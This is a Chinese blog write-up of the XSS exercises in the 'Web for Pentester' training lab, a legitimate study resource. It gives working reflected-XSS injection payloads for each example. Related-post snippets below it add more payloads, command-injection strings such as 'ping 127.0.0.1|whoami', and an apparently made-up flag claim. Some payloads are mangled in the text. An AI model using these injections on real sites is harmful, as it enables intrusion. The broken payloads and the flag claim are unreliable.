web for pentester_1学习之xss(跨站脚本攻击)

于 2019-08-30 12:49:09 发布
阅读量859 收藏 4
点赞数
分类专栏: web  for pentester_1 学习 文章标签: web  for pentester_1 xss web  for pentester系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40950781/article/details/100150108
版权

web for pentester 1学习之xss


关于xss(跨站脚本攻击的具体介绍和实现方式以及防御等,请看:

https://blog.csdn.net/weixin_40950781/article/details/100007103

关于web for pentester的安装:

web for pentester是国外开发的一款靶机,其相对dvwa各有优缺点,给本人的感受是,dvwa相对

较基础一点,web for pentester相对提高了一点难度,建议先学习dvwa。

1.镜像:链接:https://pan.baidu.com/s/1dwUAfJy4nHYb4qmZss4ilQ 提取码:mr2w

2.安装:在虚拟机中,选择安装Debian的系统即可,没有什么复杂的,配置好后能访问即可。

在这里插入图片描述

0x01 example.1

一般情况下,低级别都没有进行过滤,直接使用xss标准

payload:<script>alert("xxx")</script>

在这里插入图片描述

0x02 example.2

直接使用标准xss的payload,发现并未弹窗,而是直接输出了alert(“xxx”)在这里插入图片描述
极有可能是过滤了< script>标签:尝试大小写

paylo:</script>

在这里插入图片描述

0x03 example.3

发现大小写也不管用了,使用下双写:

payload:<scipt>
在这里插入图片描述

0x04 example.4

尝试标准xss的payload的变形都失效了,换标签

payload:<img src=0 onerror=alert("xxx")>

在这里插入图片描述

0x05 example.5

尝试上面几个example中的payload的,发现标签被过滤,而alert(“xxx”)未被过滤,使用其他弹窗函数:

payload:payload:<script>prompt("xxx")</script>	//prompt:输入框
	     payload:<script>confirm("xxx")</script>   //confirm:确认框

在这里插入图片描述

0x06 example.6

采用的不是直接过滤,而是传递的变量,闭合双引号:

payload: name=hacker";alert("xxx")//
	或者 name=hacker";alert("xxx");"

在这里插入图片描述

0x07 example.7

使用常量传递参数,使用方法闭合单引号:

payload: name=hacker';alert(1);'
或者      name=hacker';alert(1)//

在这里插入图片描述

0x08 example.8

example.8 主要在< form>表单提交存在xss漏洞,闭合提交引号的:

payload:http://192.168.15.120/xss/example8.php/" ><script>alert(1)</script><"

在这里插入图片描述

0x09 example.9

example.9中使用document.write(location.hash.substring(1)):考的是利用location.hash获取url中#后面的部分,这个substring是从第一个字符取到最后,然后document.write写到页面中。
但是,火狐浏览器并没有成功。等待进一步探讨。

litchi125
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web for pentester靶机xss漏洞
Long_gone的博客
10-20 449
Example 1 这关进去以后是个这个页面: 页面显示的 Hello hacker 和url上最后name=后的一样,然后再看一下源码: 在源码的下方找到这个输出的位置,第一关一般都比较简单,不会有太多的过滤,所以先用常用的<script>标签来尝试一下: <script>alert(1)</script> 成功弹出。 Example 2 进来以后和第...
初始web for pentester(靶场)之XSS
supreme_lu的博客
03-22 534
昨天由于刚接触web安全,不了解靶场相关知识,加上网站上关于web for pentester有关视频资料少之又少,多数是DVWA的,昨天就初步探究一下DVWA,今天看了下《白帽子讲web安全》这本书,详细了解了xss相关知识。ps:小白还是推荐先看书,不要先看百度相关论坛知识点的帖子和他人相关视频,从书本开始好一点。 example1 首先xss实验example1是一个过滤性能很低反射型xss...
Web for pentester_writeup之XSS
ditanji3425的博客
08-05 196
Web for pentester_writeup之XSSXSS跨站脚本攻击Example 1 反射性跨站脚本,URL中name字段直接在网页中显示,修改name字段, Payload: http://192.168.219.136/xss/example1.php?name=<script>alert(1)</script> ...
web for pentester XSS部分练习
若为此弦
08-21 3769
example 1 url上改成name=
web_for_pentester.pdf
03-02
安全电子说,非常实用,学习安全的一大利器
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
web_for_pentester.zip
11-26
web_for_pentester
vagrant-pentester:基于 Vagrant 的易受攻击的 Web 应用程序套件
06-27
现在有两种安装方法,要么下载完整的 Vagrant Pentester Base Box(首选),要么克隆存储库并让 Vagrantfile 针对 hashicorp/precise32 Base Box 运行脚本。 *** 这些应用程序应该只在本地主机环境中运行,最好...
web_for_pentester_I_XSS
wuerror的博客
08-15 924
example1:&lt;script&gt;alert(1)&lt;/script&gt; 直接弹窗 example2:&lt;Script&gt;alert(1)&lt;/scriPt&gt; 大小写绕过弹窗 example3:&lt;Sc&lt;script&gt;ript&gt;alert(1)&lt;/sc&lt;/script&gt;riPt&gt;双写绕过 ex
web渗透环境WebGoat和DVWA
06-24
web渗透环境WebGoat和DVWA,详情见https://blog.csdn.net/qq_32261191/article/details/80338091和https://blog.csdn.net/qq_32261191/article/details/80793823
web for pentesterxss
Merc_A的专栏
11-09 1676
1、很明显了,地址栏里name=hacker。直接name=alert(1)。 2、还是先试一下alert(1),,输出只有alert,script不见了,先换大小写试一下,成功了。。 3、还是先试一下alert(1),发现还是只输出了alert(1),换大小写也没有用,我的和呢,肯定是后台被注释掉了,那就这样pt>alert(1)ript>。 这样他注释掉一个我们还有一个。 4、你会
Web for Pentester XSS Example 01-09
PuziのPwn
07-23 1119
Refer:https://www.pentesterlab.com/exercises/web_for_pentester/ ==========Example1========= 无过滤 alert(1) ==========Example2========= 大小写替换 alert(1) ==========Example3========= 多余属性 alert(
web_for_pentest XSS系列
river
04-29 3370
web_for_pentest   XSS 系列 最近突然想把web捡起来,至少再熟悉一下吧。于是乎在freebuf上找到了这个: http://www.freebuf.com/sectool/8215.html web_for_pentest是一个集成了基础web漏洞的环境,下载iso开虚拟机就完成了环境的搭建,不懂得一搜一大堆。一个项目一个项目来,先是XSS部分(太简单了。。。大神别打我
Web for PentesterI 代码注入-实战篇
u011975363的专栏
04-25 1273
本文主要是根据官网和网上的教程进行实战,详细讲解请参照 1、https://pentesterlab.com/exercises/web_for_pentester/course 2、http://www.freebuf.com/sectool/168653.html 关于代码注入的相关知识:代码注入的原理,检测,利用,下次在补充。 一、example1 1、判断是否存在注入,在url...
web安全】第三弹:web攻防平台pentester安装及XSS部分答案解析
weixin_30536513的博客
09-30 141
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 下载链接及文档说明: http://pentesterlab.com/exercises/web_for_pentester/ 【安装流程】 1. 虚拟机中挂载镜像。 下载好ios镜像之后,在虚拟机中创建新系统。 一路向下,创建虚拟系统。 点击启动...
Web for Pentester -- xss
weixin_30363817的博客
12-28 99
0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 只能在ie上弹xss(dom型) 转载于:https://www.cnblogs.com/kaiho/p/8134172.html
【渗透测试学习平台】 web for pentester -3.XSS
07-21 562
Example 1 http://192.168.91.139/xss/example1.php?name=hacker&lt;script&gt;alert('xss')&lt;/script&gt;   Example 2 http://192.168.91.139/xss/example2.php?name=hacker&lt;ScriPt&gt;alert('xss')&lt;/S...
【渗透测试学习平台】 web for pentester -6.命令执行
07-21 1099
  命令执行漏洞 windows支持: |           ping 127.0.0.1|whoami           ||              ping  2 || whoami (哪条名令为真执行那条) &amp;  &amp;&amp;   ping 127.0.0.1&amp;&amp;whoami Linux支持: ;      127.0.0.1;whoami...
Web For Pentester 第八关分析
最新发布
06-07
第八关的网页源代码如下: ...我们可以尝试输入不同长度的字符串,例如 "abc"、"12345678901234567890" 和 "web_for_pentester",从而找到正确的 flag。 因此,第八关的 flag 是 "web_for_pentester"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值